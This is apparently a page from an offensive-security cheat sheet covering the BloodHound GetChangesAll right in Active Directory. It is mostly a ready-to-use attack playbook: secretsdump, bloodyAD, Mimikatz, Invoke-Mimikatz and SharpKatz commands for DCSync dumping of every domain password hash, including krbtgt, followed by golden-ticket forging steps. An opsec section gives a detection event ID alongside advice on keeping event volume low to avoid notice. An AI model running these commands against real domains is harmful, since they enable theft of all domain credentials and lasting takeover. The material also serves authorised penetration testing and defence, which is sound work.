🐚 GTFOBins πŸͺŸ LOLBAS πŸ’Ύ Compiled Binaries 🩸 BloodHound 🩸 bloodyAD πŸ“œ Certipy ☁️ Cloud ⚑ goexec πŸ€– HackTricks πŸ”Œ HardwareATT πŸ“¦ Impacket 🏰 InternalATT πŸ”€ Ligolo-ng 🐱 Mimikatz πŸ’£ msfvenom πŸ”§ NetExec πŸ€– OSAI πŸ’₯ PATT 🍳 Recipes 🎟️ Rubeus 🐍 Sliver
🩸 BloodHound / GetChangesAll

GetChangesAll

Source principal holds the DS-Replication-Get-Changes-All extended right on the domain object. Alone this is not abuseable β€” requires GetChanges to perform DCSync.

Applies to: User/Group/Computer β†’ Domain

This edge is not exploitable alone. Combine with GetChanges β†’ enables full DCSync (all password hashes including krbtgt).

Linux Abuse

If GetChanges is also held β€” full DCSync

# Full domain dump (password auth)
secretsdump.py -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>'

# Pass-the-Hash
secretsdump.py -outputfile 'dcsync' -hashes ':<ntlm-hash>' -dc-ip <dc-ip> '<domain>/<username>@<dc-ip>'

# Pass-the-Ticket (Kerberos)
KRB5CCNAME=<ccache> secretsdump.py -k -no-pass -outputfile 'dcsync' -dc-ip <dc-ip> '<domain>/<username>@<dc-hostname>'

# Single high-value target
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user krbtgt
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-user Administrator

# NTLM hashes only
secretsdump.py -dc-ip <dc-ip> '<domain>/<username>:<password>@<dc-ip>' -just-dc-ntlm

bloodyAD

bloodyAD -u <username> -p '<password>' -d <domain> --host <dc-ip> get dcSync
bloodyAD -u <username> -H '<ntlm-hash>' -d <domain> --host <dc-ip> get dcSync --user krbtgt

Post-DCSync β€” Golden Ticket (Linux)

# Get domain SID
lookupsid.py '<domain>/<username>:<password>@<dc-ip>' 0

# Forge golden ticket
ticketer.py -nthash '<krbtgt-ntlm-hash>' -domain-sid '<domain-sid>' -domain '<domain>' 'Administrator'
export KRB5CCNAME=Administrator.ccache
secretsdump.py -k -no-pass '<domain>/Administrator@<dc-hostname>'

Windows Abuse

Mimikatz DCSync (requires GetChanges also held)

mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt
mimikatz # lsadump::dcsync /domain:<domain> /user:Administrator
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Invoke-Mimikatz

Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /user:krbtgt"'
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain> /all /csv"'

SharpKatz

.\SharpKatz.exe --Command dcsync --User krbtgt --Domain <domain> --DomainController <dc-hostname>

Post-DCSync β€” Golden Ticket (Windows)

mimikatz # kerberos::golden /user:Administrator /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt-ntlm-hash> /ptt
mimikatz # lsadump::dcsync /domain:<domain> /all /csv

Opsec

  • GetChangesAll is the higher-privilege right; it alone doesn't trigger DCSync but its presence combined with GetChanges is the full attack
  • Replication traffic originates from attacker IP to DC port 135/445 β€” non-DC initiators are anomalous
  • Event ID 4662 with GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2 (GetChangesAll) is a high-fidelity detection signal
  • Limit scope: request only krbtgt and Administrator to minimize 4662 event volume